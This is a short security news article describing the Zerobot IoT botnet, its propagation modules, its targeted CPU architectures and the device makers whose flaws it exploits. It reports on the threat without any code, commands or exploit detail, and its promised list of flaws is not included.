Zerobot: New Botnet Campaign Exploits Vulnerabilities
Dozens of IoT Security Flaws Actively Being Used to Launch DDoS Attacks.
Last updated on July 18, 2023
Please note that the term “Zerobot” in this article refers to a specific malware variant, not to zerobot.ai, an organization which offers a verbal chatbot service.
Recently, a Go-based botnet, Zerobot, was seen spreading in the wild. It took advantage of nearly two dozen different security vulnerabilities found in IoT devices and other software. The malware infects devices with a DDoS botnet, which launches powerful attacks against specified targets.
The campaign allegedly began after November 18, and primarily singles out Windows and Linux operating systems to gain control of vulnerable machines.
In their advisory, the researchers claim the botnet:
…contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol.
Zerobot is a propagation script that’s used to retrieve the malicious payload once it has access to a computer. It knows what kind of microarchitecture (i.e., “zero.arm64”) the host has and then uses that information to extract the payload. The malware targets a wide range of CPU architectures, including i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64 and s390x.
Two distinct versions of Zerobot have been observed to date:
One used before November 24, which includes basic functions,
The updated version with a self-propagating module that can breach other endpoints by making use of 21 exploits.
Some common vulnerabilities that are included in the update include TOTOLINK routers, Zyxel firewalls, F5 BIG-IP, Hikvision cameras, FLIR AX8 thermal imaging cameras, D-Link DNS-320 NAS, and Spring Framework.
The advisory lists the exploited flaws as follows:
Mihaela is a digital content creator for Heimdal® and the proud owner of an old soul and a curious mind. Passionate to learn and discover more about cybersecurity, she will gladly share her latest finds with you.